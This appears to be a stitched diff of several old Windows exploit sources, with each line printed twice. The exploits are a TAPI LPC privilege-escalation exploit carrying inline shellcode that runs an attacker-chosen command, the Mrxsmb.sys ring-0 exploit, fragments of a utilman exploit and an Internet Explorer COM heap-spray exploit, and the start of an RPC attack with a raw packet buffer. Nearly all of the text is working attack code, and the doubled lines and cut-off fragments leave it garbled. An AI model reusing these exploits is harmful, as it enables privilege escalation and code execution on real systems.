HANDLE RootDirectory; HANDLE RootDirectory;
UNICODE_STRING *ObjectName; UNICODE_STRING *ObjectName;
ULONG Attributes; ULONG Attributes;
PVOID SecurityDescriptor; PVOID SecurityDescriptor;
PVOID SecurityQualityOfService; PVOID SecurityQualityOfService;
} OBJECT_ATTRIBUTES; } OBJECT_ATTRIBUTES;
#define InitializeObjectAttributes( p, n, a, r, s ) { \ #define InitializeObjectAttributes( p, n, a, r, s ) { \
(p)->Length = sizeof( OBJECT_ATTRIBUTES ); \ (p)->Length = sizeof( OBJECT_ATTRIBUTES ); \
(p)->RootDirectory = r; \ (p)->RootDirectory = r; \
(p)->Attributes = a; \ (p)->Attributes = a; \
(p)->ObjectName = n; \ (p)->ObjectName = n; \
(p)->SecurityDescriptor = s; \ (p)->SecurityDescriptor = s; \
(p)->SecurityQualityOfService = NULL; \ (p)->SecurityQualityOfService = NULL; \
} }
WCHAR * uString=(WCHAR *) HeapAlloc(GetProcessHeap(), 0, 0x100); WCHAR * uString=(WCHAR *) HeapAlloc(GetProcessHeap(), 0, 0x100);
LPVOID lpLocalAddress,lpTargetAddress; LPVOID lpLocalAddress,lpTargetAddress;
DWORD ConnectToLPCPort(){ DWORD ConnectToLPCPort(){
HMODULE hNtdll; HMODULE hNtdll;
HANDLE hPort; HANDLE hPort;
LPCSECTIONINFO sectionInfo; LPCSECTIONINFO sectionInfo;
LPCSECTIONMAPINFO mapInfo; LPCSECTIONMAPINFO mapInfo;
byte ConnectDataBuffer[100]; byte ConnectDataBuffer[100];
DWORD Size = sizeof(ConnectDataBuffer); DWORD Size = sizeof(ConnectDataBuffer);
WCHAR * uString=L"\\RPC Control\\tapsrvlpc";//TAPI LPC port WCHAR * uString=L"\\RPC Control\\tapsrvlpc";//TAPI LPC port
DWORD i; DWORD i;
UNICODE_STRING uStr; UNICODE_STRING uStr;
for (i=0;i<100;i++) for (i=0;i<100;i++)
ConnectDataBuffer[i]=0x0; ConnectDataBuffer[i]=0x0;
hNtdll=LoadLibrary("ntdll.dll"); hNtdll=LoadLibrary("ntdll.dll");
DWORD (WINAPI * pfnNtConnectPort)(HANDLE*,UNICODE_STRING * ,SECURITY_QUALITY_OF_SERVICE*,DWORD*,DWORD*,DWORD*,DWORD*,DWORD*); DWORD (WINAPI * pfnNtConnectPort)(HANDLE*,UNICODE_STRING * ,SECURITY_QUALITY_OF_SERVICE*,DWORD*,DWORD*,DWORD*,DWORD*,DWORD*);
pfnNtConnectPort= (DWORD (WINAPI *)(HANDLE* ,UNICODE_STRING *,SECURITY_QUALITY_OF_SERVICE*,DWORD*,DWORD*,DWORD*,DWORD*,DWORD*))GetProcAddress(hNtdll,"NtConnectPort"); pfnNtConnectPort= (DWORD (WINAPI *)(HANDLE* ,UNICODE_STRING *,SECURITY_QUALITY_OF_SERVICE*,DWORD*,DWORD*,DWORD*,DWORD*,DWORD*))GetProcAddress(hNtdll,"NtConnectPort");
DWORD (WINAPI * pfnCreateSection)(HANDLE* ,DWORD,DWORD,PLARGE_INTEGER,DWORD,DWORD,DWORD); DWORD (WINAPI * pfnCreateSection)(HANDLE* ,DWORD,DWORD,PLARGE_INTEGER,DWORD,DWORD,DWORD);
pfnCreateSection= (DWORD (WINAPI *)(HANDLE* ,DWORD,DWORD,PLARGE_INTEGER,DWORD,DWORD,DWORD))GetProcAddress(hNtdll,"NtCreateSection"); pfnCreateSection= (DWORD (WINAPI *)(HANDLE* ,DWORD,DWORD,PLARGE_INTEGER,DWORD,DWORD,DWORD))GetProcAddress(hNtdll,"NtCreateSection");
HANDLE hSection; HANDLE hSection;
LARGE_INTEGER SecSize; LARGE_INTEGER SecSize;
DWORD maxSize=0; DWORD maxSize=0;
SecSize.LowPart=0x1000; SecSize.LowPart=0x1000;
SecSize.HighPart=0x0; SecSize.HighPart=0x0;
SECURITY_QUALITY_OF_SERVICE qos; SECURITY_QUALITY_OF_SERVICE qos;
DWORD qosSize=4; DWORD qosSize=4;
qos.Length =(DWORD)&qosSize; qos.Length =(DWORD)&qosSize;
qos.ImpersonationLevel =(_SECURITY_IMPERSONATION_LEVEL)0x2; qos.ImpersonationLevel =(_SECURITY_IMPERSONATION_LEVEL)0x2;
qos.ContextTrackingMode =0x01000101; qos.ContextTrackingMode =0x01000101;
qos.EffectiveOnly =0x10000; qos.EffectiveOnly =0x10000;
//create shared section //create shared section
pfnCreateSection(&hSection,SECTION_ALL_ACCESS,NULL,&SecSize,PAGE_READWRITE,SEC_COMMIT ,NULL); pfnCreateSection(&hSection,SECTION_ALL_ACCESS,NULL,&SecSize,PAGE_READWRITE,SEC_COMMIT ,NULL);
memset(&sectionInfo, 0, sizeof(sectionInfo)); memset(&sectionInfo, 0, sizeof(sectionInfo));
memset(&mapInfo, 0, sizeof(mapInfo)); memset(&mapInfo, 0, sizeof(mapInfo));
sectionInfo.Length = 0x18; sectionInfo.Length = 0x18;
sectionInfo.SectionHandle =hSection; sectionInfo.SectionHandle =hSection;
sectionInfo.SectionSize = SHARED_SECTION_SIZE; sectionInfo.SectionSize = SHARED_SECTION_SIZE;
mapInfo.Length = 0x0C; mapInfo.Length = 0x0C;
uStr.Length = wcslen(uString)*2; uStr.Length = wcslen(uString)*2;
uStr.MaximumLength = wcslen(uString)*2+2; uStr.MaximumLength = wcslen(uString)*2+2;
uStr.Buffer =uString; uStr.Buffer =uString;
//connect to LPC port //connect to LPC port
if (!pfnNtConnectPort(&hPort,&uStr,&qos,(DWORD *)&sectionInfo,(DWORD *)&mapInfo,&maxSize,(DWORD*)ConnectDataBuffer,&Size)){ if (!pfnNtConnectPort(&hPort,&uStr,&qos,(DWORD *)&sectionInfo,(DWORD *)&mapInfo,&maxSize,(DWORD*)ConnectDataBuffer,&Size)){
lpLocalAddress =(LPVOID)sectionInfo.ClientBaseAddress ; lpLocalAddress =(LPVOID)sectionInfo.ClientBaseAddress ;
lpTargetAddress =(LPVOID)sectionInfo.ServerBaseAddress ; lpTargetAddress =(LPVOID)sectionInfo.ServerBaseAddress ;
return 1; return 1;
} }
return 0; return 0;
} }
int main(int argc, char* argv[]) int main(int argc, char* argv[])
{ {
HMODULE hKernel; HMODULE hKernel;
DWORD iStrLen; DWORD iStrLen;
FARPROC pWinExec,pExitThread; FARPROC pWinExec,pExitThread;
LPSTR sCommand; LPSTR sCommand;
if (!argv[1]) { if (!argv[1]) {
printf("\nUsage :\n TapiExploit \"command\" \n"); printf("\nUsage :\n TapiExploit \"command\" \n");
printf("\nExample :\n TapiExploit \"cmd.exe\" \n"); printf("\nExample :\n TapiExploit \"cmd.exe\" \n");
exit(0); exit(0);
} }
iStrLen=strlen(argv[1]); iStrLen=strlen(argv[1]);
if(iStrLen>=65){ if(iStrLen>=65){
printf("\n\"command\" must be less than 65 chars.\n"); printf("\n\"command\" must be less than 65 chars.\n");
exit(0); exit(0);
} }
sCommand=argv[1]; sCommand=argv[1];
if (!ConnectToLPCPort()){ //connect to TAPI LPC port if (!ConnectToLPCPort()){ //connect to TAPI LPC port
printf("Could not connect to LPC port \nTAPI service couldn't be running\nTry again."); printf("Could not connect to LPC port \nTAPI service couldn't be running\nTry again.");
exit(0); exit(0);
} }
hKernel=LoadLibrary("Kernel32.dll"); hKernel=LoadLibrary("Kernel32.dll");
// pWinExec=GetProcAddress(hKernel,"WinExec"); // pWinExec=GetProcAddress(hKernel,"WinExec");
pWinExec=GetProcAddress(hKernel,"CreateProcessA"); pWinExec=GetProcAddress(hKernel,"CreateProcessA");
pExitThread=GetProcAddress(hKernel,"ExitThread"); pExitThread=GetProcAddress(hKernel,"ExitThread");
CHAR sWinSta[]="WinSta0\\Default"; CHAR sWinSta[]="WinSta0\\Default";
//copy shellcode //copy shellcode
_asm { _asm {
pushad pushad
lea esi, Shellcode lea esi, Shellcode
mov edi, lpLocalAddress mov edi, lpLocalAddress
add edi, 0x10 add edi, 0x10
lea ecx, End lea ecx, End
sub ecx, esi sub ecx, esi
push esi push esi
push edi push edi
cld cld
rep movsb rep movsb
pop edi pop edi
pop esi pop esi
push edi push edi
lea ecx, CommandBuf lea ecx, CommandBuf
sub ecx, esi sub ecx, esi
add edi, ecx add edi, ecx
mov esi, sCommand mov esi, sCommand
mov ecx, iStrLen mov ecx, iStrLen
rep movsb rep movsb
mov [edi], 0x00 mov [edi], 0x00
pop edi pop edi
mov esi, pWinExec mov esi, pWinExec
mov [edi+0x0a], esi mov [edi+0x0a], esi
mov esi, pExitThread mov esi, pExitThread
mov [edi+0x0e], esi mov [edi+0x0e], esi
////////////// //////////////
add edi, 0x2f0 add edi, 0x2f0
lea esi, sWinSta lea esi, sWinSta
mov ecx, 0xf mov ecx, 0xf
cld cld
rep movsb rep movsb
/////////////// ///////////////
jmp Done jmp Done
Shellcode: Shellcode:
jmp Start jmp Start
// this gets overwritten // this gets overwritten
mov ax,0xffff mov ax,0xffff
mov ax,0xffff mov ax,0xffff
mov ax,0xffff mov ax,0xffff
mov ax,0xffff mov ax,0xffff
CommandBuf: // this gets overwritten CommandBuf: // this gets overwritten
mov dword ptr[eax],0x55555555 mov dword ptr[eax],0x55555555
mov dword ptr[eax],0x55555555 mov dword ptr[eax],0x55555555
mov dword ptr[eax],0x55555555 mov dword ptr[eax],0x55555555
mov dword ptr[eax],0x55555555 mov dword ptr[eax],0x55555555
mov dword ptr[eax],0x55555555 mov dword ptr[eax],0x55555555
mov dword ptr[eax],0x55555555 mov dword ptr[eax],0x55555555
mov dword ptr[eax],0x55555555 mov dword ptr[eax],0x55555555
mov dword ptr[eax],0x55555555 mov dword ptr[eax],0x55555555
mov dword ptr[eax],0x55555555 mov dword ptr[eax],0x55555555
mov dword ptr[eax],0x55555555 mov dword ptr[eax],0x55555555
mov dword ptr[eax],0x55555555 mov dword ptr[eax],0x55555555
Start: Start:
call getDelta call getDelta
getDelta: getDelta:
pop edx // Get shellcode/shared section pointer pop edx // Get shellcode/shared section pointer
push edx push edx
/* push 0x1 // push 0x0 for hidden window /* push 0x1 // push 0x0 for hidden window
lea eax, [edx-0x47] lea eax, [edx-0x47]
push eax // Command offset push eax // Command offset
call [edx-0x4f] // Call WinExec call [edx-0x4f] // Call WinExec
*/ */
mov eax, edx mov eax, edx
add eax,0x500 add eax,0x500
push eax //LPPROCESS_INFORMATION push eax //LPPROCESS_INFORMATION
add eax, 0x100 add eax, 0x100
mov ebx, edx mov ebx, edx
xor bl, bl xor bl, bl
lea ecx, [ebx+0x300] lea ecx, [ebx+0x300]
lea ebx, [eax+0x8] lea ebx, [eax+0x8]
mov [ebx], ecx //set windows station and desktop mov [ebx], ecx //set windows station and desktop
push eax //LPSTARTUPINFO push eax //LPSTARTUPINFO
push 0x0 push 0x0
push 0x0 push 0x0
push 0x0 push 0x0
push 0x0 push 0x0
push 0x0 push 0x0
push 0x0 push 0x0
lea eax, [edx-0x47] lea eax, [edx-0x47]
push eax // Command offset push eax // Command offset
push 0x0 push 0x0
call [edx-0x4f] // Call create process call [edx-0x4f] // Call create process
pop edx pop edx
call [edx-0x4b] // Call ExitThread call [edx-0x4b] // Call ExitThread
End: End:
Done: Done:
popad popad
} }
LPSTR lpszAppFilename=(LPSTR )HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, 0x21C) ; LPSTR lpszAppFilename=(LPSTR )HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, 0x21C) ;
LINEEXTENSIONID ExtensionID; LINEEXTENSIONID ExtensionID;
memset(lpszAppFilename,0x58,0x21A); memset(lpszAppFilename,0x58,0x21A);
_asm{ _asm{
pushad pushad
mov ebx, lpszAppFilename mov ebx, lpszAppFilename
lea ebx, [ebx+0x216] lea ebx, [ebx+0x216]
mov eax, lpTargetAddress mov eax, lpTargetAddress
add eax, 0x10 add eax, 0x10
mov [ebx], eax mov [ebx], eax
popad popad
} }
lineSetAppPriorityW((LPWSTR )lpszAppFilename,NULL,&ExtensionID,LINEREQUESTMODE_MAKECALL,NULL,NULL); lineSetAppPriorityW((LPWSTR )lpszAppFilename,NULL,&ExtensionID,LINEREQUESTMODE_MAKECALL,NULL,NULL);
Sleep(1000); Sleep(1000);
printf("Command should have been executed ;)\n"); printf("Command should have been executed ;)\n");
return 0; return 0;
} }
// milw0rm.com [2006-03-14] // milw0rm.com [2006-03-14]


@ -1,232 +1,232 @@
/////////////////////////////////////////////////////////////////////////////////////// ///////////////////////////////////////////////////////////////////////////////////////
// Mrxsmb.sys XP & 2K Ring0 Exploit (6/12/2005) // Mrxsmb.sys XP & 2K Ring0 Exploit (6/12/2005)
// Tested on XP SP2 && 2K SP4 // Tested on XP SP2 && 2K SP4
// Disable ReadOnly Memory protection // Disable ReadOnly Memory protection
// HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management\EnforceWriteProtection = 0 // HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management\EnforceWriteProtection = 0
// ----------------------------------------------------------------------------------- // -----------------------------------------------------------------------------------
// ONLY FOR EDUCATIONAL PURPOSES. // ONLY FOR EDUCATIONAL PURPOSES.
// ----------------------------------------------------------------------------------- // -----------------------------------------------------------------------------------
// Rubén Santamarta. // Rubén Santamarta.
// www.reversemode.com // www.reversemode.com
// ----------------------------------------------------------------------------------- // -----------------------------------------------------------------------------------
// OVERVIEW // OVERVIEW
// ----------------------------------------------------------------------------------- // -----------------------------------------------------------------------------------
// There are 3 possible values to change in order to adjust the exploit to other versions. // There are 3 possible values to change in order to adjust the exploit to other versions.
// # XPSP2 (XP Service Pack 2) // # XPSP2 (XP Service Pack 2)
// This variable is equal to the File offset of the Call that we are modifying minus 0xC // This variable is equal to the File offset of the Call that we are modifying minus 0xC
//. #XPSP2 => 3D88020000 cmp eax,000000288 //. #XPSP2 => 3D88020000 cmp eax,000000288
//. 770B ja .000064BBE -- //. 770B ja .000064BBE --
//. 50 push eax //. 50 push eax
//. 51 push ecx //. 51 push ecx
//. E812E2FFFF call .000062DCC -- MODIFIED CALL -- //. E812E2FFFF call .000062DCC -- MODIFIED CALL --
// ----------------------------------------------------------------------------------- // -----------------------------------------------------------------------------------
// #W2KSP4 (Windows 2000 Service Pack 4) // #W2KSP4 (Windows 2000 Service Pack 4)
// The same method previosly explained but regarding to Windows 2000 Service Pack 4. // The same method previosly explained but regarding to Windows 2000 Service Pack 4.
// ----------------------------------------------------------------------------------- // -----------------------------------------------------------------------------------
// $OffWord // $OffWord
// This variable is defined in CalcJump() Function. // This variable is defined in CalcJump() Function.
// E812E2FFFF call .000062DCC -- MODIFIED CALL -- // E812E2FFFF call .000062DCC -- MODIFIED CALL --
// The exploit calculates automatically the relative jump, but we need to provide it // The exploit calculates automatically the relative jump, but we need to provide it
// the 2 bytes following opcode Call(0xE8). In example, as we can see, to test in XP // the 2 bytes following opcode Call(0xE8). In example, as we can see, to test in XP
// OffWord will be equal to 0xE212. // OffWord will be equal to 0xE212.
////////////////////////////////////////////////////////////////////////////////////// //////////////////////////////////////////////////////////////////////////////////////
#include <windows.h> #include <windows.h>
#include <stdio.h> #include <stdio.h>
#define XPSP2 0x54BAC #define XPSP2 0x54BAC
#define W2KSP4 0x50ADD #define W2KSP4 0x50ADD
#define MAGIC_IOCTL 0x141043 #define MAGIC_IOCTL 0x141043
typedef BOOL (WINAPI *PENUMDEVICES)(LPVOID*, typedef BOOL (WINAPI *PENUMDEVICES)(LPVOID*,
DWORD , DWORD ,
LPDWORD); LPDWORD);
typedef DWORD (WINAPI *PGETDEVNAME)(LPVOID ImageBase, typedef DWORD (WINAPI *PGETDEVNAME)(LPVOID ImageBase,
LPTSTR lpBaseName, LPTSTR lpBaseName,
DWORD nSize); DWORD nSize);
VOID ShowError() VOID ShowError()
{ {
LPVOID lpMsgBuf; LPVOID lpMsgBuf;
FormatMessage(FORMAT_MESSAGE_ALLOCATE_BUFFER| FORMAT_MESSAGE_FROM_SYSTEM, FormatMessage(FORMAT_MESSAGE_ALLOCATE_BUFFER| FORMAT_MESSAGE_FROM_SYSTEM,
NULL, NULL,
GetLastError(), GetLastError(),
MAKELANGID(LANG_NEUTRAL, SUBLANG_DEFAULT), MAKELANGID(LANG_NEUTRAL, SUBLANG_DEFAULT),
(LPTSTR) &lpMsgBuf, (LPTSTR) &lpMsgBuf,
0, 0,
NULL); NULL);
MessageBoxA(0,(LPTSTR)lpMsgBuf,"Error",0); MessageBoxA(0,(LPTSTR)lpMsgBuf,"Error",0);
exit(1); exit(1);
} }
DWORD CalcJump(DWORD BaseMRX,BOOL InXP,DWORD *hValue,DWORD *ShellAddr) DWORD CalcJump(DWORD BaseMRX,BOOL InXP,DWORD *hValue,DWORD *ShellAddr)
{ {
DWORD SumTemp; DWORD SumTemp;
DWORD IniAddress; DWORD IniAddress;
DWORD i; DWORD i;
DWORD sumAux; DWORD sumAux;
DWORD addTemp; DWORD addTemp;
DWORD OffWord; DWORD OffWord;
if(InXP) if(InXP)
{ {
SumTemp=BaseMRX+XPSP2+0xE; SumTemp=BaseMRX+XPSP2+0xE;
OffWord=0xE212; OffWord=0xE212;
} }
else else
{ {
SumTemp=BaseMRX+W2KSP4+0xE; SumTemp=BaseMRX+W2KSP4+0xE;
OffWord=0xa971; OffWord=0xa971;
} }
for(i=0x4c;i<0xDDDC;i=i+4) for(i=0x4c;i<0xDDDC;i=i+4)
{ {
sumAux=~((i*0x10000)+OffWord); sumAux=~((i*0x10000)+OffWord);
addTemp=SumTemp-sumAux; addTemp=SumTemp-sumAux;
if(addTemp>0xE000000 && addTemp<0xF000000){ if(addTemp>0xE000000 && addTemp<0xF000000){
IniAddress=addTemp&0xFFFFF000; IniAddress=addTemp&0xFFFFF000;
*hValue=i-4; *hValue=i-4;
*ShellAddr=addTemp; *ShellAddr=addTemp;
break; break;
} }
} }
printf("\nINFORMATION \n"); printf("\nINFORMATION \n");
printf("-----------------------------------------------------\n"); printf("-----------------------------------------------------\n");
printf("Patched Driver Call pointing to \t [0x%p]\n",addTemp); printf("Patched Driver Call pointing to \t [0x%p]\n",addTemp);
return (IniAddress); return (IniAddress);
} }
int main(int argc, char *argv[]) int main(int argc, char *argv[])
{ {
PENUMDEVICES pEnumDeviceDrivers; PENUMDEVICES pEnumDeviceDrivers;
PGETDEVNAME pGetDeviceDriverBaseName; PGETDEVNAME pGetDeviceDriverBaseName;
LPVOID arrMods[200],addEx; LPVOID arrMods[200],addEx;
DWORD cb,i,devNum,dwTemp,hValue,Ring0Addr,junk,ShellAddr,BaseMRX=0; DWORD cb,i,devNum,dwTemp,hValue,Ring0Addr,junk,ShellAddr,BaseMRX=0;
DWORD *OutBuff,*InBuff; DWORD *OutBuff,*InBuff;
HANDLE hDevice; HANDLE hDevice;
BOOL InXP; BOOL InXP;
CHAR baseName[255]; CHAR baseName[255];
CONST CHAR Ring0ShellCode[]="\xCC"; //"PUT YOUR RING0 CODE HERE :)" CONST CHAR Ring0ShellCode[]="\xCC"; //"PUT YOUR RING0 CODE HERE :)"
if(argc<2) if(argc<2)
{ {
printf("\nMRXSMB.SYS RING0 Exploit\n"); printf("\nMRXSMB.SYS RING0 Exploit\n");
printf("--- Ruben Santamarta ---\n"); printf("--- Ruben Santamarta ---\n");
printf("Tested on XPSP2 & W2KSP4\n"); printf("Tested on XPSP2 & W2KSP4\n");
printf("\nusage> exploit.exe <XP> or <2K>\n"); printf("\nusage> exploit.exe <XP> or <2K>\n");
exit(1); exit(1);
} }
if(strncmp(argv[1],"XP",2)==0) if(strncmp(argv[1],"XP",2)==0)
InXP=TRUE; InXP=TRUE;
else else
InXP=FALSE; InXP=FALSE;
pEnumDeviceDrivers=(PENUMDEVICES)GetProcAddress(LoadLibrary("psapi.dll"), pEnumDeviceDrivers=(PENUMDEVICES)GetProcAddress(LoadLibrary("psapi.dll"),
"EnumDeviceDrivers"); "EnumDeviceDrivers");
pGetDeviceDriverBaseName=(PGETDEVNAME)GetProcAddress(LoadLibrary("psapi.dll"), pGetDeviceDriverBaseName=(PGETDEVNAME)GetProcAddress(LoadLibrary("psapi.dll"),
"GetDeviceDriverBaseNameA"); "GetDeviceDriverBaseNameA");
pEnumDeviceDrivers(arrMods,sizeof(arrMods),&cb); pEnumDeviceDrivers(arrMods,sizeof(arrMods),&cb);
devNum=cb/sizeof(LPVOID); devNum=cb/sizeof(LPVOID);
printf("\nSearching Mrxsmb.sys Base Address..."); printf("\nSearching Mrxsmb.sys Base Address...");
for(i=1;i<=devNum;i++) for(i=1;i<=devNum;i++)
{ {
pGetDeviceDriverBaseName(arrMods[i],baseName,254); pGetDeviceDriverBaseName(arrMods[i],baseName,254);
if((strncmp(baseName,"mrxsmb",6)==0)) if((strncmp(baseName,"mrxsmb",6)==0))
{ {
printf("[%x] Found!\n",arrMods[i]); printf("[%x] Found!\n",arrMods[i]);
BaseMRX=(DWORD)arrMods[i]; BaseMRX=(DWORD)arrMods[i];
} }
} }
if(!BaseMRX) if(!BaseMRX)
{ {
printf("Not Found\nExiting\n\n"); printf("Not Found\nExiting\n\n");
exit(1); exit(1);
} }
addEx=(LPVOID)CalcJump(BaseMRX,InXP,&hValue,&ShellAddr); addEx=(LPVOID)CalcJump(BaseMRX,InXP,&hValue,&ShellAddr);
OutBuff=(DWORD*)VirtualAlloc((LPVOID)addEx,0xF000,MEM_COMMIT|MEM_RESERVE,PAGE_EXECUTE_READWRITE); OutBuff=(DWORD*)VirtualAlloc((LPVOID)addEx,0xF000,MEM_COMMIT|MEM_RESERVE,PAGE_EXECUTE_READWRITE);
if(!OutBuff) ShowError(); if(!OutBuff) ShowError();
printf("F000h bytes allocated at \t\t [0x%p]\n",addEx); printf("F000h bytes allocated at \t\t [0x%p]\n",addEx);
printf("Value needed \t\t\t [0x%p]\n",hValue+4); printf("Value needed \t\t\t [0x%p]\n",hValue+4);
InBuff=OutBuff; InBuff=OutBuff;
printf("Checking Shadow Device..."); printf("Checking Shadow Device...");
hDevice = CreateFile("\\\\.\\shadow", hDevice = CreateFile("\\\\.\\shadow",
FILE_EXECUTE, FILE_EXECUTE,
FILE_SHARE_READ|FILE_SHARE_WRITE, FILE_SHARE_READ|FILE_SHARE_WRITE,
NULL, NULL,
OPEN_EXISTING, OPEN_EXISTING,
0, 0,
NULL); NULL);
if (hDevice == INVALID_HANDLE_VALUE) ShowError(); if (hDevice == INVALID_HANDLE_VALUE) ShowError();
printf("[OK]\n"); printf("[OK]\n");
printf("Querying Device...\n"); printf("Querying Device...\n");
while(OutBuff[3]< hValue) while(OutBuff[3]< hValue)
{ {
DeviceIoControl(hDevice, // "\\.\shadow" DeviceIoControl(hDevice, // "\\.\shadow"
MAGIC_IOCTL, // Privileged IOCTL MAGIC_IOCTL, // Privileged IOCTL
InBuff, 2, // InBuffer, InBufferSize InBuff, 2, // InBuffer, InBufferSize
OutBuff, 0x18,// OutBuffer,OutBufferSize OutBuff, 0x18,// OutBuffer,OutBufferSize
&junk, // bytes returned &junk, // bytes returned
(LPOVERLAPPED) NULL); (LPOVERLAPPED) NULL);
printf("\r\t[->]VALUES: (%x)",OutBuff[3]); printf("\r\t[->]VALUES: (%x)",OutBuff[3]);
} }
if(InXP) if(InXP)
Ring0Addr=BaseMRX+XPSP2; Ring0Addr=BaseMRX+XPSP2;
else else
Ring0Addr=BaseMRX+W2KSP4; Ring0Addr=BaseMRX+W2KSP4;
printf("Overwritting Driver Call at[%x]...",Ring0Addr); printf("Overwritting Driver Call at[%x]...",Ring0Addr);
DeviceIoControl(hDevice, // "\\.\shadow" DeviceIoControl(hDevice, // "\\.\shadow"
MAGIC_IOCTL, // Privileged IOCTL MAGIC_IOCTL, // Privileged IOCTL
InBuff, 2, // InBuffer, InBufferSize InBuff, 2, // InBuffer, InBufferSize
(LPVOID)Ring0Addr, 0x18,// OutBuffer,OutBufferSize 0x (LPVOID)Ring0Addr, 0x18,// OutBuffer,OutBufferSize 0x
&junk, // bytes returned &junk, // bytes returned
(LPOVERLAPPED) NULL); (LPOVERLAPPED) NULL);
printf("[OK]\n"); printf("[OK]\n");
for(i=1;i<0x3C00;i++) OutBuff[i]=0x90909090; for(i=1;i<0x3C00;i++) OutBuff[i]=0x90909090;
memcpy((LPVOID*)ShellAddr,(LPVOID*)Ring0ShellCode,sizeof(Ring0ShellCode)); memcpy((LPVOID*)ShellAddr,(LPVOID*)Ring0ShellCode,sizeof(Ring0ShellCode));
printf("Sending IOCTL to execute the ShellCode\n"); printf("Sending IOCTL to execute the ShellCode\n");
DeviceIoControl(hDevice, // "\\.\shadow" DeviceIoControl(hDevice, // "\\.\shadow"
MAGIC_IOCTL, // Privileged IOCTL MAGIC_IOCTL, // Privileged IOCTL
InBuff, 2, // InBuffer, InBufferSize InBuff, 2, // InBuffer, InBufferSize
OutBuff, 0x18,// OutBuffer,OutBufferSize OutBuff, 0x18,// OutBuffer,OutBufferSize
&junk, // bytes returned &junk, // bytes returned
(LPOVERLAPPED) NULL); (LPOVERLAPPED) NULL);
dwTemp=CloseHandle(hDevice); dwTemp=CloseHandle(hDevice);
if(!dwTemp) ShowError(); if(!dwTemp) ShowError();
dwTemp=VirtualFree(OutBuff,0xf000,MEM_DECOMMIT); dwTemp=VirtualFree(OutBuff,0xf000,MEM_DECOMMIT);
if(!dwTemp) ShowError(); if(!dwTemp) ShowError();
return(1); return(1);
} }
// milw0rm.com [2006-06-14] // milw0rm.com [2006-06-14]


@ -177,6 +177,6 @@ int main(int argc, char* argv[])
SendMessage (FindWindow(NULL, lang[i].utilman), WM_CLOSE, 0, 0);// close utilitymanager SendMessage (FindWindow(NULL, lang[i].utilman), WM_CLOSE, 0, 0);// close utilitymanager
return 0; return 0;
} }
// milw0rm.com [2004-07-17] // milw0rm.com [2004-07-17]


@ -138,6 +138,6 @@ for (i=0;i<750;i++) memory[i] = block + shellcode;
</SCRIPT> </SCRIPT>
<object classid="CLSID:3F8A6C33-E0FD-11D0-8A8C-00A0C90C2BC5"></object> <object classid="CLSID:3F8A6C33-E0FD-11D0-8A8C-00A0C90C2BC5"></object>
Microsoft Internet Explorer blnmgr.dll COM Object Remote Exploit Microsoft Internet Explorer blnmgr.dll COM Object Remote Exploit
# milw0rm.com [2005-08-09] # milw0rm.com [2005-08-09]


@ -1,397 +1,397 @@
/* /*
Hard to exploit, isn't it? I have tested it on 10+ box, most of them allocated 0x9X0058 for Hard to exploit, isn't it? I have tested it on 10+ box, most of them allocated 0x9X0058 for
me, however, I cannot write the pointer to 0x7ffdf020 since the length I can control should be me, however, I cannot write the pointer to 0x7ffdf020 since the length I can control should be
divided exactly by 8 (merde), so I choose 0x684191c4. divided exactly by 8 (merde), so I choose 0x684191c4.
This following program is mostly like a D.O.S. 10+ blackbox were tested, only 5 were owned, This following program is mostly like a D.O.S. 10+ blackbox were tested, only 5 were owned,
and I think the successful rate should be much lower in real circumstance. and I think the successful rate should be much lower in real circumstance.
I mark it as a POC and wish someone (no hat) could supply us a much better exploit. It is I mark it as a POC and wish someone (no hat) could supply us a much better exploit. It is
said that this fault could be steered clear of and another segfault is consequently triggered, said that this fault could be steered clear of and another segfault is consequently triggered,
so... so...
Any mails are welcome but spam, I need NO viagra. Je suis celibataire. Any mails are welcome but spam, I need NO viagra. Je suis celibataire.
Greetz: Greetz:
All SST guys, I love your bald heads that never hatted. All SST guys, I love your bald heads that never hatted.
Shuo Yang, I love you. Shuo Yang, I love you.
OYXin, ... OYXin, ...
Code by: Code by:
Swan (Swan[at]0x557[dot]org) Swan (Swan[at]0x557[dot]org)
*/ */
#include <stdio.h> #include <stdio.h>
#include <winsock2.h> #include <winsock2.h>
#include <windows.h> #include <windows.h>
#pragma comment(lib, "ws2_32.lib") #pragma comment(lib, "ws2_32.lib")
char peer0_0[72] = { char peer0_0[72] = {
(char)0x05, (char)0x00, (char)0x0b, (char)0x03, (char)0x10, (char)0x00, (char)0x00, (char)0x00, (char)0x05, (char)0x00, (char)0x0b, (char)0x03, (char)0x10, (char)0x00, (char)0x00, (char)0x00,
(char)0x48, (char)0x00, (char)0x00, (char)0x00, (char)0x01, (char)0x00, (char)0x00, (char)0x00, (char)0x48, (char)0x00, (char)0x00, (char)0x00, (char)0x01, (char)0x00, (char)0x00, (char)0x00,
(char)0xd0, (char)0x16, (char)0xd0, (char)0x16, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0xd0, (char)0x16, (char)0xd0, (char)0x16, (char)0x00, (char)0x00, (char)0x00, (char)0x00,
(char)0x01, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x01, (char)0x00, (char)0x01, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x01, (char)0x00,
(char)0xe0, (char)0x0c, (char)0x6b, (char)0x90, (char)0x0b, (char)0xc7, (char)0x67, (char)0x10, (char)0xe0, (char)0x0c, (char)0x6b, (char)0x90, (char)0x0b, (char)0xc7, (char)0x67, (char)0x10,
(char)0xb3, (char)0x17, (char)0x00, (char)0xdd, (char)0x01, (char)0x06, (char)0x62, (char)0xda, (char)0xb3, (char)0x17, (char)0x00, (char)0xdd, (char)0x01, (char)0x06, (char)0x62, (char)0xda,
(char)0x01, (char)0x00, (char)0x00, (char)0x00, (char)0x04, (char)0x5d, (char)0x88, (char)0x8a, (char)0x01, (char)0x00, (char)0x00, (char)0x00, (char)0x04, (char)0x5d, (char)0x88, (char)0x8a,
(char)0xeb, (char)0x1c, (char)0xc9, (char)0x11, (char)0x9f, (char)0xe8, (char)0x08, (char)0x00, (char)0xeb, (char)0x1c, (char)0xc9, (char)0x11, (char)0x9f, (char)0xe8, (char)0x08, (char)0x00,
(char)0x2b, (char)0x10, (char)0x48, (char)0x60, (char)0x02, (char)0x00, (char)0x00, (char)0x00 }; (char)0x2b, (char)0x10, (char)0x48, (char)0x60, (char)0x02, (char)0x00, (char)0x00, (char)0x00 };
